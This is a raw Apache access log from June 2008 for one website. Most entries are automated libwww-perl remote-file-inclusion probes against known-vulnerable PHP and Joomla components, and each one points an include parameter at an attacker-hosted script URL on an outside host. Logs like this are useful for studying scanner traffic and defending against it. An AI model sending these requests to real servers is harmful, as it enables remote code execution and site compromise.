210.48.67.39 - - [17/Jun/2008:12:40:27 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:40:27 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:40:32 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:12:40:37 -0700] "GET /logs/access_071212.log HTTP/1.0" 200 89527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:12:40:37 -0700] "GET /logs/access_071230.log//popup_window.php?site_isp_root=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:40:37 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:12:40:37 -0700] "GET //popup_window.php?site_isp_root=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:12:40:38 -0700] "GET /logs//popup_window.php?site_isp_root=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:40:38 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:40:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:12:40:47 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:12:40:48 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:40:56 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:40:56 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:40:58 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:40:58 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:40:59 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:40:59 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:40:59 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:40:59 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:41:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:41:01 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:41:04 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.98.208.5 - - [17/Jun/2008:12:41:07 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.98.208.5 - - [17/Jun/2008:12:41:07 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:41:14 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:41:14 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:41:14 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:41:14 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:41:14 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:41:15 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:41:23 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.155.9.236 - - [17/Jun/2008:12:41:23 -0700] "GET /index.php?body=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 200 18429 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:41:24 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:41:25 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:41:25 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:41:25 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
87.230.2.238 - - [17/Jun/2008:12:41:31 -0700] "GET /logs/access_071229.log/index.php?new=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:41:33 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:41:35 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:41:37 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:41:37 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.2.238 - - [17/Jun/2008:12:41:37 -0700] "GET /logs/index.php?new=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:41:38 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.130.151.241 - - [17/Jun/2008:12:41:38 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback HTTP/1.1" 200 6910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
87.230.2.238 - - [17/Jun/2008:12:41:38 -0700] "GET /index.php?new=http://www.ducklus.nl/id.txt? HTTP/1.1" 200 18355 "-" "libwww-perl/5.76" "www.dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:41:40 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:41:40 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:41:40 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:12:41:42 -0700] "GET /logs/access_080215.log//popup_window.php?site_isp_root=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.2.238 - - [17/Jun/2008:12:41:46 -0700] "GET /logs/access_080228.log/index.php?new=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:12:41:49 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:41:49 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:41:49 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:41:50 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:12:41:50 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:41:54 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:41:55 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:41:55 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:41:59 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:01 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:42:04 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:42:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:42:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:42:19 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:42:19 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:42:19 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:42:19 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:42:20 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:42:23 -0700] "GET /logs/access.log/index.php?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:25 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:42:26 -0700] "GET /index.php?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 18379 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:42:27 -0700] "GET /logs/index.php?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:33 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:39 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:39 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:42 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:42 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:42 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:42:53 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:42:53 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:42:53 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:55 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:42:56 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:43:00 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:43:04 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:43:04 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:43:05 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:12:43:09 -0700] "GET /logs/db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:12:43:09 -0700] "GET /db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:43:09 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:43:09 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:43:09 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
210.120.128.65 - - [17/Jun/2008:12:43:21 -0700] "GET /logs/access_080215.log/index.php?x=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:43:45 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:43:48 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:12:43:50 -0700] "GET /logs/index.php?open=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:12:43:52 -0700] "GET /index.php?open=http://nozyk.org/rob.txt? HTTP/1.1" 200 18349 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:43:58 -0700] "GET /logs/access_080312.log//?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:43:58 -0700] "GET /logs/access_080312.log//?page=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:43:58 -0700] "GET /logs/access_080312.log//?p=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.140.181.20 - - [17/Jun/2008:12:44:01 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://h.b-warez.com/r.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.140.181.20 - - [17/Jun/2008:12:44:01 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://h.b-warez.com/r.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:44:02 -0700] "GET //?page=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 18381 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:44:02 -0700] "GET //?p=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 18375 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:44:02 -0700] "GET //?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 18379 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:44:04 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:44:04 -0700] "GET /logs//?p=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 52280 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:44:04 -0700] "GET /logs//?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 52280 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:44:04 -0700] "GET /logs//?page=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 52280 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.76.110 - - [17/Jun/2008:12:44:06 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [17/Jun/2008:12:44:07 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [17/Jun/2008:12:44:07 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:44:10 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:44:10 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:44:10 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.240.91 - - [17/Jun/2008:12:44:14 -0700] "GET /logs/index.php?redir=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.240.91 - - [17/Jun/2008:12:44:16 -0700] "GET /index.php?redir=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 200 18393 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:44:18 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:12:44:20 -0700] "GET /?S=A HTTP/1.0" 200 18241 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:44:21 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:44:21 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
